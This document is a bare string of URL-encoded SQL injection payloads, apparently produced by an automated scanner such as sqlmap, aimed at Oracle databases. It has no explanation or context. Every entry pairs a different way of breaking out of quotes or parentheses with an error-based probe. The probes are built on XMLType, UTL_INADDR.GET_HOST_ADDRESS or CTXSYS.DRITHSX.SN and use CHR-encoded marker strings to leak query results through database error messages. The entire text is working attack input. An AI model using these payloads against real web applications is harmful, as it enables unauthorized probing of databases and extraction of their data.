-3612%27%29%29%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27DxLD%27%3D%27DxLD -1418%27%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27srcA%27%3D%27srcA -2685%27%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27fWqZ%27%20LIKE%20%27fWqZ -1177%27%29%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27azYH%27%20LIKE%20%27azYH -8342%27%29%29%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27JYJg%27%20LIKE%20%27JYJg -4162%27%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27Vfkc%27%20LIKE%20%27Vfkc -8526%22%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22TKZQ%22%3D%22TKZQ -7813%22%29%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22KkNA%22%3D%22KkNA -8899%22%29%29%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22Wupm%22%3D%22Wupm -8389%22%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22VVFR%22%3D%22VVFR -9332%22%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22QBlL%22%20LIKE%20%22QBlL -5123%22%29%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22MivJ%22%20LIKE%20%22MivJ -2776%22%29%29%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22qnRT%22%20LIKE%20%22qnRT -3131%22%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22jqCW%22%20LIKE%20%22jqCW -7616%29%20WHERE%205774%3D5774%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -8101%27%29%20WHERE%201419%3D1419%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -3644%27%20WHERE%209135%3D9135%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -3054%22%20WHERE%202245%3D2245%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -9789%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 -9527%27%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 -3307%27%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 -5707%22%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 -3520%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%286618%3D6618 -6233%29%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%288428%3D8428 -3839%29%29%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%285895%3D5895 -9401%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 -6742%27%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%27iIwk%27%3D%27iIwk -4965%27%29%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27VtaZ%27%3D%27VtaZ -4625%27%29%29%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27TvcD%27%3D%27TvcD -1501%27%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%27DDZG%27%3D%27DDZG -1257%27%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%27cqQW%27%20LIKE%20%27cqQW -5414%27%29%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27pFhp%27%20LIKE%20%27pFhp -3980%27%29%29%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27PApy%27%20LIKE%20%27PApy -5029%27%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%27mYON%27%20LIKE%20%27mYON -6254%22%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%22zFJk%22%3D%22zFJk -1791%22%29%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22OtbQ%22%3D%22OtbQ -5415%22%29%29%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22CGas%22%3D%22CGas -5502%22%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%22WcBp%22%3D%22WcBp -6128%22%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%22NVNM%22%20LIKE%20%22NVNM -9520%22%29%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22HGaP%22%20LIKE%20%22HGaP -6380%22%29%29%29%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22QbZC%22%20LIKE%20%22QbZC -2826%22%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%22GRqm%22%20LIKE%20%22GRqm -2068%29%20WHERE%202400%3D2400%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 -3485%27%29%20WHERE%203032%3D3032%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 -3934%27%20WHERE%202298%3D2298%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 -4655%22%20WHERE%205240%3D5240%20OR%207383%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287383%3D7383%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 -4368%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 -7979%27%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 -9633%27%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 -6080%22%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 -5417%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%289399%3D9399 -8683%29%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%281566%3D1566 -3573%29%29%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%287936%3D7936 